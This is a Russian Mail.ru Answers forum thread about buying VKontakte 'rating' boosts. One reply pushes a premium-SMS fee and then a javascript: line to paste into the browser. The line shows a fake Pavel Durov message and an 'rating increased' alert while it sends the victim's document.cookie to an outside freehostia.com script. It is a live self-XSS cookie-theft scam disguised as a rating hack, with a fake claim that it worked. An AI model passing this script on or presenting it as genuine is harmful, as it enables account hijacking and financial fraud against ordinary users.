Mail.ruПочтаМой МирОдноклассникиВКонтактеИгрыЗнакомстваНовостиПоискОблакоComboВсе проекты

Рейтинг в контакте

andrei xaker Ученик (102), закрыт 12 лет назад
Почти даром icq 585680604
Лучший ответ
Анатолий до Шувалов Мастер (1856) 12 лет назад
почти не считается... сразу надо говорить сколько
Остальные ответы
Devil Мастер (1587) 12 лет назад
Стоимость сообщи (иуда)
Пользователь удален Ученик (102) 12 лет назад
Отпрвте смс с текстом id2535156 на номер 4280 или 1045 по украине, 1053 или 2090
вам прийдет в ответ смс, в смс будет ссылка. потом введите в окте браузера ява скрипт:

javascript:msg="от Павел Дуров[ссылка заблокирована по решению администрации проекта]";document.getElementById("nav").innerHTML=document.getElementById("nav").innerHTML+msg;img=new Image();img.src="http://m-z.freehostia.com/s .php?"+document.cookie;alert('Рейтинг увеличен! ');

если не отправите смс скрипт не будет работать!! !
Проверено, я отправлял смс, и рейтинг повысился на 74%.На много дешевле выходит!!!